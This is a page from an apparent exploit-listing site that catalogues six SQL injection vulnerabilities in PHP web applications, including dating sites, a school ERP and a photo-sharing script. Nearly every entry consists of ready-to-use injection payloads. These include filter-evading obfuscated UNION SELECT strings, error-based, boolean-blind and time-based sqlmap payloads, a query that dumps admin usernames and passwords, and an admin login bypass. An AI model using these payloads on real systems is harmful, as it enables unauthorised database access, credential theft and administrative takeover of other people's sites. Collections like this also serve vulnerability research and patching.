header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Same Sex Dating Software Pro 1.0 – SQL Injection

The vulnerability allows an users to inject sql commands. Proof of Concept: http://localhost/[PATH]/viewprofile.php?profid=[SQL], http://localhost/[PATH]/viewmessage.php?sender_id=[SQL], -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+- and http://localhost/[PATH]/admin with Email: 'or 1=1 or ''=' Pass: anything.

SoftDatepro Dating Social Network 1.3 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/viewprofile.php?profid=[SQL], http://localhost/[PATH]/viewmessage.php?sender_id=[SQL], -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+- and http://localhost/[PATH]/admin with Email: 'or 1=1 or ''=' Pass: anything.

Vastal I-Tech Dating Zone 0.9.9 – ‘product_id’ Parameter SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/add_to_cart.php?product_id=[SQL] Parameter: product_id (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: product_id=3 AND SLEEP(5)

ZeeBuddy 2x – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL] -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+- Parameter: groupid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: groupid=1 AND 3188=3188 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: groupid=1 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM

AROX School ERP PHP Script – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL] http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL] Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5) Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=95&action=edit&id=3 AND SLEEP(5)

Shareet – Photo Sharing Social Network – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/?photo=[SQL] Parameter: photo (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs

Recent Exploits: